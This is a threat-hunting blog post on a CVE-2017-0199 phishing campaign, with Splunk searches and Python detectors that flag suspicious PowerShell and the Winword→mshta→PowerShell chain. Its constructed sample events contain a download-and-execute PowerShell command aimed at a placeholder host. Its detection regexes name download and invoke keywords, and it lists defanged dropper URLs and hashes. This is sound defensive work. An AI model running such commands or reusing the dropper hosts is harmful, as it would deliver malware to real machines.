The content of the mails is a fake shipping order with a ZIP attachment containing the malicious RTF file. An example of this file is on VirusTotal: https://virustotal.com/#/file/cc1cca6b713f6ab0ddb81639b64e52f12a9875ab1e08034d5722826aef4b3164/detection
This malicious RTF file exploits CVE-2017-0199, the Office OLE2Link flaw that lets a document fetch a remote HTA file and hand it to mshta.exe for execution.
PowerShell is used by this campaign, hence monitoring suspicious executed PowerShell commands would detect it. I wrote a bit about this approach here.
In this case, monitoring all HTTP/HTTPS connections opened by PowerShell would detect it:
index=main powershell "tag::eventtype"=network
| table _time process DestinationHostname DestinationIp DestinationPort
Or any PowerShell command with suspicious parameters, for example with the following Splunk query (the keywords are grouped so the alternation applies to every term):
index=main powershell | regex CommandLine="(?i)(-en|-e|-encoded|
hidden|download|webclient|invoke-expression|new-object|base64|
createobject|uploadfile)" | table _time ParentCommandLine CommandLine
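The two searches above are hunt queries run inside Splunk. The following Python is an added example (not from the original post or the campaign) that runs the same detection logic over constructed Sysmon-style events, and goes one step further than the command-line regex: it also decodes an -EncodedCommand payload and scans the decoded script, because the keywords the query looks for are invisible to a regex while they sit inside the Base64 blob. The event field names, paths and the encoded payload are assumptions made for the example.

```python
import base64
import re

# Keyword list from the Splunk query above, grouped so the alternation applies to
# every term.
SUSPICIOUS = re.compile(
    r"(?i)(-en|-e|-encoded|hidden|download|webclient|invoke-expression|"
    r"new-object|base64|createobject|uploadfile)"
)

# powershell.exe accepts -ec and any prefix of -EncodedCommand (-e, -en, -enc, ...);
# the value is Base64 of a UTF-16LE script. Longest prefix is listed first.
_PREFIXES = "|".join("encodedcommand"[:i] for i in range(len("encodedcommand"), 0, -1))
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:ec|%s)\s+([A-Za-z0-9+/=]+)" % _PREFIXES)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def suspicious_powershell(event):
    """Keywords matched in a Sysmon process-create event (EventID 1) for powershell.exe.
    Both the raw command line and the decoded payload are scanned: a regex over
    CommandLine alone never sees 'DownloadString' hidden inside a Base64 blob."""
    if event.get("EventID") != 1 or "powershell" not in event.get("Image", "").lower():
        return []
    texts = [event.get("CommandLine", "")]
    decoded = decode_encoded_command(texts[0])
    if decoded:
        texts.append(decoded)
    return sorted({k.lower() for t in texts for k in SUSPICIOUS.findall(t)})


def powershell_network(events):
    """Sysmon network-connect events (EventID 3) initiated by powershell.exe,
    the equivalent of the first Splunk search above."""
    return [(e["DestinationHostname"], e["DestinationPort"]) for e in events
            if e.get("EventID") == 3 and "powershell" in e.get("Image", "").lower()]


# Constructed sample events (assumed field names); the encoded payload is built here
# for the example and is not the campaign's command.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a')"
_B64 = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode()
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": PS, "CommandLine": "powershell.exe -NoP -W hidden -e " + _B64},
    {"EventID": 1, "Image": PS,
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"EventID": 3, "Image": PS, "DestinationHostname": "www.iso9001-certificare.ro",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventID": 3, "Image": "C:\\Program Files\\Internet Explorer\\iexplore.exe",
     "DestinationHostname": "www.microsoft.com", "DestinationIp": "203.0.113.11",
     "DestinationPort": 443},
]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        hits = suspicious_powershell(e)
        if hits:
            print(e["CommandLine"][:60], "->", hits)
    print("PowerShell connections:", powershell_network(SAMPLE_EVENTS))
```

Note that the benign backup script is flagged too, purely because "-e" matches the start of "-ExecutionPolicy"; a single short token like "-e" in the keyword list is noisy, and in practice you would score on several hits (here: hidden plus an encoded payload that downloads and invokes) rather than alert on one.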
Coming back to the initial RTF file, the PowerShell command executed is as follows:
It basically acts as a dropper for hxxps://www.iso9001-certificare.ro/a/Seal_Encrypted.exe. The malicious file is on VirusTotal.
However, the Use Cases above are generic ones for detecting suspicious PowerShell commands, and I am interested in detecting this specific CVE-2017-0199 exploitation scenario.
During the attack phase Winword.exe retrieves a malicious HTA file from a remote server over HTTPS. With this in mind, we can create a Splunk search for any ".hta" file created by Winword.exe under the user's "AppData" directory, where it lands as a Temporary Internet File.
For example, a query like this does the job:
index=main EventDescription="File Created" Image="*Winword*"
TargetFilename="*AppData*.hta" | table Image TargetFilename
The file retrieved in this case is hxxps://www.iso9001-certificare.ro/a/12.hta
I have uploaded a copy of the file here https://virustotal.com/#/file/e6bf9b7fbf30e2ba8bc2c6c0ee117f6cbb604b25fb0b4be24a3fb3e062987b3d/community
Another approach is to hunt for any PowerShell process whose parent process is mshta.exe:
index=main ParentImage="*mshta.exe" CommandLine=*powershell*
| table _time ParentCommandLine CommandLine
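Each of the two searches above catches one stage of the chain (Winword writing the .hta, mshta launching PowerShell). The Python below is an added example, not from the original post, that applies both checks to constructed Sysmon-style events and then joins them: a Winword .hta write followed within a few minutes by an mshta-spawned PowerShell on the same host is the complete CVE-2017-0199 execution chain, which is a far stronger signal than either stage alone. Field names (EventID, UtcTime, Computer, Image, TargetFilename, ParentImage, CommandLine), the INetCache path and the timestamps are assumptions made for the example.

```python
import re
from datetime import datetime, timedelta

# Sysmon EventID 11 (FileCreate): Winword writing an .hta anywhere under \AppData\
# (the Temporary Internet Files / INetCache location used when Office fetches the HTA).
HTA_IN_APPDATA = re.compile(r"(?i)\\AppData\\.*\.hta$")


def winword_drops_hta(event):
    """Stage 1 of the chain: the search on EventDescription="File Created" above."""
    return (event.get("EventID") == 11
            and event.get("Image", "").lower().endswith("\\winword.exe")
            and HTA_IN_APPDATA.search(event.get("TargetFilename", "")) is not None)


def mshta_spawns_powershell(event):
    """Stage 2 of the chain: the ParentImage="*mshta.exe" search above (EventID 1)."""
    return (event.get("EventID") == 1
            and event.get("ParentImage", "").lower().endswith("\\mshta.exe")
            and "powershell" in event.get("CommandLine", "").lower())


def _ts(event):
    return datetime.strptime(event["UtcTime"], "%Y-%m-%d %H:%M:%S")


def correlate(events, window=timedelta(minutes=5)):
    """Return (hta_event, powershell_event) pairs on the same host where the
    mshta->powershell launch follows the Winword .hta write within `window`."""
    drops = [e for e in events if winword_drops_hta(e)]
    launches = [e for e in events if mshta_spawns_powershell(e)]
    chains = []
    for d in drops:
        for l in launches:
            if l["Computer"] == d["Computer"] and timedelta(0) <= _ts(l) - _ts(d) <= window:
                chains.append((d, l))
    return chains


# Constructed sample events (assumed field layout); "12[1].hta" mirrors the 12.hta
# name from the post, the cache directory name is invented.
WINWORD = "C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 11, "UtcTime": "2017-11-20 09:14:02", "Computer": "WS01", "Image": WINWORD,
     "TargetFilename": "C:\\Users\\alice\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\K3P9QX2Z\\12[1].hta"},
    {"EventID": 11, "UtcTime": "2017-11-20 09:14:00", "Computer": "WS01", "Image": WINWORD,
     "TargetFilename": "C:\\Users\\alice\\Downloads\\~$Po-096.doc"},  # normal lock file
    {"EventID": 1, "UtcTime": "2017-11-20 09:14:05", "Computer": "WS01", "Image": PS,
     "ParentImage": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a')\""},
    {"EventID": 1, "UtcTime": "2017-11-20 09:20:00", "Computer": "WS02", "Image": PS,
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\inventory.ps1"},  # benign
    {"EventID": 1, "UtcTime": "2017-11-20 10:05:00", "Computer": "WS02", "Image": PS,
     "ParentImage": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": "powershell.exe -w hidden -c whoami"},  # stage 2 with no stage 1 on WS02
]

if __name__ == "__main__":
    for drop, launch in correlate(SAMPLE_EVENTS):
        print(drop["Computer"], drop["TargetFilename"], "->", launch["CommandLine"][:50])
```

The stage-2 hit on WS02 with no preceding Winword .hta write is still worth a look (mshta launching PowerShell is rarely legitimate), but only WS01 produces the full chain; keeping the individual stage alerts and adding the correlated one lets you triage the latter first.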
Indicators:
www.iso9001-certificare.ro
www.iso9001-certificare.ro/a/12.hta
www.iso9001-certificare.ro/a/Seal_Encrypted.exe
aea9347409f465a5d9665f868c5258c6 - 12.hta
1db41de874e3539762ea7ea3b416de2d - Po-096.doc
ff61db305ab6f924451cdbe51c66ba1e - Po-096.zip
c1e4f507f85420ad116acf521dc241c6 - drgtgrt.exe